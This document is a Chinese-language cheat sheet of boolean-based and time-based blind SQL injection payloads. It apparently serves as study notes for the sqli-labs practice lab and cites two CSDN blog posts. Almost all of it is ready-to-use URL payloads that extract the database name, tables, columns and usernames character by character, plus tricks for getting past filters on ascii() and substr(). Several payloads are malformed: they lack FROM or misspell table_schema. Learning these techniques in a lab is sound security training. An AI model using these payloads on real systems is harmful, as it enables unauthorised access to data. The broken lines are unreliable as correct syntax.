SQL注入__布爾盲注和時間盲注

SQL注入__布爾盲注和時間盲注

布爾盲注

猜測數據庫
?id=1' and length(database())=8-- -
?id=1' and length(database())>8-- -
當前數據庫第一位 截取數據庫第一位 通過Ascii碼值比較
id=1' and left(database(),1)>'a' -- - 
id=1' and left(database(),1)>'z' -- - 
在a-z之間
id=1' and left(database(),1)>'r' -- -
id=1' and left(database(),1)>'s' -- -
id=1' and left(database(),2)>'sa'-- -

猜測表
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a是從0開始第幾個表，b是爲第幾個字符，n是ASCII所對應的十進制數
substr("abc",1,1) 切割函數  從第一位開始切割 切割第一個 返回a
substr("abc",2,1) 切割函數  從第一位開始切割 切割第一個 返回b
substr("abc",1,2) 從第一位開始切割 切割兩位 返回ab
substr("abc",0,1)  #在PHP中是從0開始，MySQL中是從1開始
第一個表
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
(select table_name information_schema.tables where tables_schema=database() limit 0,1)返回第一個表 
substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1)切割第一位
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))>102
第二個表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判斷user表

/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101
ord()繞過ascii()  mid()繞過substr()

sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

參考：https://blog.csdn.net/weixin_53324462/article/details/113800035

時間盲注

盲注
時間盲注
sleep(X)函數，延遲X秒後回顯
?id=1' and sleep(5)-- -
if（判斷語句，x，y）如果判斷語句正確則輸出X，否則輸出Y
?id=1' and if(1=1,1,sleep(1))即輸出1
?id=1' and if(1=2,1,sleep(1))即延遲1秒後回顯

?id=1' and if(length(database())>8,sleep(2),0)
?id=1' and if(length(database())>=8,sleep(5),1)-- -
判斷庫名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
?id=1' and if(ascii(substr(database(),1,1))>95,sleep(6),1)-- -
判斷表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)- --
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(2),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+

參考：https://blog.csdn.net/qq_51954912/article/details/116100446